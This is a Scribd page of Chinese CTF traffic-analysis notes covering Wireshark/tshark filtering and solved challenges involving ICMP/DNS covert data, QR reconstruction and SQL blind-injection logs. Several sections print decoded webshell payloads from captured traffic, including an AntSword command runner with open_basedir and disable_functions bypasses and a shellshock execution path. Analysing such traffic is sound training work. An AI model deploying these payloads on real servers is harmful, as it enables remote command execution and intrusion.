Scribd
Upload
14 views38 pages

流量分析

The document provides a comprehensive guide on traffic analysis using Wireshark and Tshark, detailing various filtering and searching techniques for analyzing network packets. It includes examples of decoding URLs, decrypting scripts, and extracting flags from different data formats. Additionally, it covers methods for generating QR codes and handling various protocols like HTTP and ICMP to retrieve hidden information.

Uploaded by

day s
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
14 views38 pages

流量分析

The document provides a comprehensive guide on traffic analysis using Wireshark and Tshark, detailing various filtering and searching techniques for analyzing network packets. It includes examples of decoding URLs, decrypting scripts, and extracting flags from different data formats. Additionally, it covers methods for generating QR codes and handling various protocols like HTTP and ICMP to retrieve hidden information.

Uploaded by

day s
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 38

流量分析

Wireshark 使用
1、过滤功能

常见过滤语法

Bash
http.request.uri contains "php"
http.request.method == "POST"
2、搜索功能

例如直接搜索字符串,flag:
例如搜索:666c6167

3、追踪流量包,通过查看数据包的十六进制格式,进而拷贝传输中的某些格式的文件。
4、http 对象导出功能

全部保存下来
5、查看响应数据
Tshark 使用
Bash
tshark -r shiftFlow.pcapng -T fields -e
"http.request.full_uri" | grep -v '^\s*$'

-r:指定文件名
-T:指定输出格式
-e:指定提取的字段
-Y:指定过滤语法

tshark -r sqltest.pcapng
tshark -r sqltest.pcapng -Y "http"

tshark -r sqltest.pcapng -Y "http" -T fields -e "http.request.uri"


流量分析-1
Bash
cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D
%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXR
fdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2V
jaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J
EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQY
XRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VT
Ew7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kT
jskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c
3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7J
FI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQ
GlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNob
yAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=Q
zpcXFVzZXJzXFx4eGh6elxcRGVza3RvcFxcdXBsb2FkLWxhYnMtZW52LXdpb
i0wLjEtYmV0YS4xXFx1cGxvYWQtbGFicy1lbnZcXFdXV1xcdXBsb2FkXFw
%3D

url 解码

Bash
cmd=@eval(base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9s
aW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+
fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5k
aXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBG
b3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVM
TDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0
ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJh
c2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4k
VC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2Rpcigk
UCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtA
Y2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7
&z1=QzpcXFVzZXJzXFx4eGh6elxcRGVza3RvcFxcdXBsb2FkLWxhYnMtZW52
LXdpbi0wLjEtYmV0YS4xXFx1cGxvYWQtbGFicy1lbnZcXFdXV1xcdXBsb2Fk
XFw=

Z0:

Bash
@
ini_set("display_errors", "0");@
set_time_limit(0);@
set_magic_quotes_runtime(0);
echo("->|");;
$D = base64_decode($_POST["z1"]);
$F = @opendir($D);
if ($F == NULL) {
echo("ERROR:// Path Not Found Or No Permission!");
} else {
$M = NULL;
$L = NULL;
while ($N = @readdir($F)) {
$P = $D.
"/".$N;
$T = @date("Y-m-d H:i:s", @filemtime($P));@
$E = substr(base_convert(@fileperms($P), 10, 8), -
4);
$R = "\t".$T.
"\t".@filesize($P).
"\t".$E.
"
";if(@is_dir($P))$M.=$N." / ".$R;else $L.=$N.
$R;}echo $M.$L;@closedir($F);};echo(" | < -");die();

Z1:

Bash
C:\\Users\\xxhzz\\Desktop\\upload-labs-env-win-0.1-beta.1\\
upload-labs-env\\WWW\\upload\\

流量分析-2
追踪 tcp 流发现了一个加密脚本

SQL
from Crypto import Random
from Crypto.Cipher import AES

import sys
import base64

//解密函数
def decrypt(encrypted, passphrase):
IV = encrypted[:16]
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.decrypt(encrypted[16:])

//加密函数
def encrypt(message, passphrase):
IV = message[:16]
length = 16
count = len(message)
padding = length - (count % length)
message = message + '\0' * padding
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
//iv
IV = 'YUFHJKVWEASDGQDH'
message = IV + 'flag is hctf{xxxxxxxxxxxxxxx}'
print len(message)
example = encrypt(message, 'Qq4wdrhhyEWe4qBF')
print example
example = decrypt(example, 'Qq4wdrhhyEWe4qBF')
print example

SQL
mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV
90XhAOkIs/OXoYVw5uQDjVvgNA==

或者使用 cyberchef 解密

流量分析-3
发现输出 flag.zip 的十六进制形式,显示分组字节流

得到压缩包,压缩包密码在注释里面。
流量分析-4
发现上传 rar,提取 rar 数据。hosts 头存在密码

解压拿到 flag

流量分析-5

icmp 的数据包中数据的长度的 ascii 转 base64 就是 flag。


Bash
tshark -r analyse.pcapng -Y "icmp.type == 8" -e "data.len" -
T fields

发现有 DNS 协议,域名有很多二进制数字,猜测可能由域名组成二维码图片

于是提取域名

Bash
tshark -r analyse.pcapng -Y "dns and ip.dst == 119.29.29.29"
-T fields -e "dns.qry.name" | grep "0" | awk -F '.' '{print
$1}'
1 即位黑色,0 即位白色,使用 python 生成二维码

Bash
from PIL import Image
from zlib import *

str = '''
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00011111111111100100000001100111001111111111110000
00011111111111100100000001100111001111111111110000
00011000000001100011110011100110001100000000110000
00011000000001100011110011100110001100000000110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100100110011100000001101111110110000
00011011111101100100110011100000001101111110110000
00011011111101100000001100000111001101111110110000
00011011111101100000001100000111001101111110110000
00011000000001100011000000011110001100000000110000
00011111111111100100110010011001001111111111110000
00011111111111100100110010011001001111111111110000
00000000000000000000111101111001000000000000000000
00000000000000000000111101111001000000000000000000
00000011001111100111000000011000110000011000110000
00000000001110000100110010000110111110011000110000
00000000001110000100110010000110111110011000110000
00000000001110000100110010000110111110011000110000
00000000001111111111110000000111110011111000110000
00000000001111111111110000000111110011111000110000
00000000001111111111110000000111110011111000110000
00000000111110000000110010000001000011111001110000
00000000111110000000110010000001000011111001110000
00000011001111111111111111100111001110011000110000
00000011111100000011000000011110001110000001110000
00000011111100000011000000011110001110000001110000
00011000110011100100000001111001000000000001110000
00011000110011100100000001111001000000000001110000
00000100001110011011110001111110110010011001000000
00000100001110011011110001111110110010011001000000
00011000111111111000001110011111111111100000110000
00000000000000000111111101100001000001100110110000
00000000000000000111111101100001000001100110110000
00011111111111100011001101111111001101111110110000
00011111111111100011001101111111001101111110110000
00011000000001100100110001100111000001111001110000
00011011111101100100111100000001111111111001000000
00011011111101100100111100000001111111111001000000
00011011111101100011111110011111000011100001000000
00011011111101100011111110011111000011100001000000
00011011111101100111000000011111000011100110110000
00011011111101100111000000011111000011100110110000
00011000000001100011001100000111110010011001000000
00011000000001100011001100000111110010011001000000
00011000000001100011001100000111110010011001000000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
'''
str = str.replace("\n","")
MAX = 50
pic = Image.new("RGB",(MAX,MAX))
i=0
for y in range(0,MAX):
for x in range(0,MAX):
if(str[i] == '1'):
pic.putpixel([x,y],(0,0,0))
else:pic.putpixel([x,y],(255,255,255))
i = i+1
pic.show()
pic.save("flag.png")

黑色像素点为(0,0,0),白色像素点为(255,255,255)。得到第二段 flag,第三段 flag 直接查看 http 协议

Bash
LQA0ADQAMwBhADYAOABiADgAfQA=

解密拿到 flag。

流量分析-6
返回包存在 flag
Bash
http.response.code == 206
http and ip.dst == 192.168.43.109

Bash
tshark -r test.pcapng -Y "http and ip.dst == 192.168.43.109"
-T fields -e "text" | awk -F ',' '{print $4}' | tr -d '\n'

流量分析-7
追踪流,发现 PNG,放到 010 的到 flag。

流量分析-8
Bash
tshark -r backdoor++.pcap -Y "icmp" -e "data.text" -T
fields | grep -v "\!" | tr -d "\n"
Bash
tshark -r backdoor++.pcap -Y "icmp" -e "data.text" -T
fields | grep -v "\!" | tr -d "\n"

Bash
tshark -r backdoor++.pcap -Y "icmp" -e "data" -T fields |
grep -v "10111213" | tr -d "000000000000000000000000" | tr -
d "\n"

流量分析-9
筛选 http 报文,发现存在带 getshell 流量的 post 请求,于是将过滤条件为
http.request.uri contains "1.php"进行进一步分析

发现读取图片操作,在响应报文中查看分组字节流,并显示图片,可能为 flag 的密码,保存备用


发现读取 flag.zip 的 shell 指令

将报文游标设置到 zip 文件流起始处 504b0304,保存并用 png 中的密码解压


得到 flag{d75e00589d44a8e861c73732836d4218}

流量分析-10
str_rot13() 函数对字符串执行 ROT13 编码。首先进行代码解密
Bash
= @ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);@
array_push($oparr, $ocwd, sys_get_temp_dir());
foreach($oparr as $item) {
if (!@is_writable($item)) {
continue;
};
$tmdir = $item.
"/.6afeb7ff";@
mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
$tmdir = realpath($tmdir);@
chdir($tmdir);@
ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {@
chdir("..");
};@
ini_set("open_basedir", "/");@
rmdir($tmdir);
break;
};
};;

function asenc($out) {
return str_rot13($out);
};

function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "6e06".
"4c06";
echo@ asenc($output);
echo "48b86".
"b89bf";
}
ob_start();
try {
$p = base64_decode(substr($_POST["bda23544a23789"], 2));
$s = base64_decode(substr($_POST["cc623db8237a89"], 2));
$envstr =
@base64_decode(substr($_POST["idbf4018a5aef8"], 2));
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" :
"/c \"{$s}\"";
if (substr($d, 0, 1) == "/") {@
putenv("PATH=".getenv("PATH").

":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/b
in");
} else {@
putenv("PATH=".getenv("PATH").

";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Wind
ows/System32/WindowsPowerShell/v1.0/;");
}
if (!empty($envstr)) {
$envarr = explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {@
putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r = "{$p} {$c}";

function fe($f) {
$d = explode(",", @ini_get("disable_functions"));
if (empty($d)) {
$d = array();
} else {
$d = array_map('trim', array_map('strtolower',
$d));
}
return (function_exists($f) && is_callable($f) && !
in_array($f, $d));
};

function runshellshock($d, $c) {


if (substr($d, 0, 1) == "/" && fe('putenv') &&
(fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") !=
FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("[email protected]", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);@
unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};

function runcmd($c) {
$ret = 0;
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
if (fe('system')) {@
system($c, $ret);
}
elseif(fe('passthru')) {@
passthru($c, $ret);
}
elseif(fe('shell_exec')) {
print(@shell_exec($c));
}
elseif(fe('exec')) {@
exec($c, $o, $ret);
print(join("
",$o));}elseif(fe('popen'))
{$fp=@popen($c,'r');while(!@feof($fp))
{print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open
')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 =>
array('pipe', 'w')), $io);while(!@feof($io[1]))
{print(@fgets($io[1],2048));}while(!@feof($io[2]))
{print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2])
;@proc_close($p);}elseif(fe('antsystem'))
{@antsystem($c);}elseif(runshellshock($d, $c)) {return
$ret;}elseif(substr($d,0,1)!=" / " && @class_exists("
COM ")){$w=new
COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();
$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se-
>ReadAll();print($ret);}else{$ret = 127;}return $ret;};
$ret=@runcmd($r."
2 > & 1 ");print ($ret!=0)?"
ret = {
$ret
}
":"
";;}catch(Exception $e){echo
"
ERROR: //".$e-
>getMessage();};asoutput();die();

从参数第三个字母开始进行 base64 解密

Bash
$p = base64_decode(substr($_POST["bda23544a23789"], 2));
$s = base64_decode(substr($_POST["cc623db8237a89"], 2));
$envstr =
@base64_decode(substr($_POST["idbf4018a5aef8"], 2));

发现返回包存在问题
发现输出被 rot13 了
Bash
Y2QgIi92YXIvd3d3L2h0bWwvY2hpbmF0ZWxlY29tIjtoZXhkdW1wIENhdFBh
c3N3ZDtlY2hvIDBkYTYwMjdiNTtwd2Q7ZWNobyAyNDczNWNhOGRl

hexdump
Bash
bee8afd51dc0000000 2346 3p53 5259 4r57 6639 5969 5q2n 402r
0000010 7531 2p24 476p 7929 5q39 4n45 7o25 2n67
0000020 7932 4r3n 396s 2q33 6839 5149 4841 7625
0000030 7444 4s27 000n
0000035
0qn6027o5
/ine/jjj/ugzy/puvangryrpbz
24735pn8qr
327121b9c

Bash
2346 3c53 5259 4e57 6639 5969 5d2a 402e
7531 2c24 476c 7929 5d39 4a45 7b25 2a67
7932 4e3a 396f 2d33 6839 5149 4841 7625
7444 4f27 000a

Bash
4623533c5952574e396669592a5d2e403175242c6c472979395d454a257b
672a32793a4e6f39332d39684951414825764474274f0a00

Bash
F#S<YRWN9fiY*].@1u$,lG)y9]EJ%{g*2y:No93-9hIQAH%vDt'O

流量分析-11-timu06.pcapng
过滤并查看 ftp 流量,发现服务端返回两个文件,将其导出
从 readme 文件中得知,flag 应该在 secret.zip 中,并且密码位 7 位一下纯数字,尝试暴力破解
解压得到 flag{9edce3221e63c521f8f74cd9ba284006}

流量分析-12-timu09.pcapng

过滤 http 报文,发现 SQL 布尔盲注流量,用 tshark 提取 request.url

使用 CyberChef 对日志进行 URLdecode2


交给 python 处理,用正则表达式提取注入成功的日志,并生成 flag

Python
import re

with open('http.log', 'r', encoding='utf-8') as file:


lines = file.readlines()

# 存储转换后的字符
converted_chars = []

prev_index = 1
prev_ascii_value = 0

# 遍历每一行
for line in lines:
# 正则表达式匹配>与#之间的数字
matches = re.search(r'\s*flag_is_here from flag limit
0,1\),(\d+),1\)\)=(\d+)\s*', line)

if matches:
index = int(matches.group(1)) # 获取 flag 字符串的 index
ascii_value = int(matches.group(2)) # 获取 flag 字符对应的
ascii 码
if index >prev_index:
char = chr(prev_ascii_value) # 将数字转换为字符
converted_chars.append(char) # 将字符添加到列表中
prev_index = index
prev_ascii_value = ascii_value

char = chr(prev_ascii_value) # 将数字转换为字符


converted_chars.append(char) # 将字符添加到列表中
# 合并所有字符
result = ''.join(converted_chars)

# 打印结果
if result:
print(f'合并后的字符: {result}')
else:
print('没有找到匹配的数字')

运行结果 合并后的字符: flag{b1e2b79a2a7f190b1b939698caff8a30}

蚁剑流量分析-Burpsuite
编码器
当使用蚁剑控制 webshell 向服务器发送数据包时,数据包中的 body 部分会按照编码器中定义的规则进行编码或者加密后在发送,这样就可以避
免有比较明显的命令执行特征从而被 WAF 拦截。
流量分析
连接流量:连接之后进行的操作行为是查看当前目录,抓取到的流量内容如下:

请求数据

Bash
@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);@
array_push($oparr, $ocwd, sys_get_temp_dir());
foreach($oparr as $item) {
if (!@is_writable($item)) {
continue;
};
$tmdir = $item.
"/.3767bdde39a9";@
mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
$tmdir = realpath($tmdir);@
chdir($tmdir);@
ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {@
chdir("..");
};@
ini_set("open_basedir", "/");@
rmdir($tmdir);
break;
};
};;

function asenc($out) {
return $out;
};

function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "f8e3a".
"0e3a19";
echo@ asenc($output);
echo "1e1c".
"b37c";
}
ob_start();
try {
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D} ";
if (substr($D, 0, 1) != "/") {
foreach(range("C", "Z") as $L) if (is_dir("{$L}:"))
$R. = "{$L}:";
} else {
$R. = "/";
}
$R. = " ";
$u = (function_exists("posix_getegid")) ?
@posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R. = php_uname();
$R. = " {$s}";
echo $R;;
} catch (Exception $e) {
echo "ERROR://".$e - > getMessage();
};
asoutput();
die();

You might also like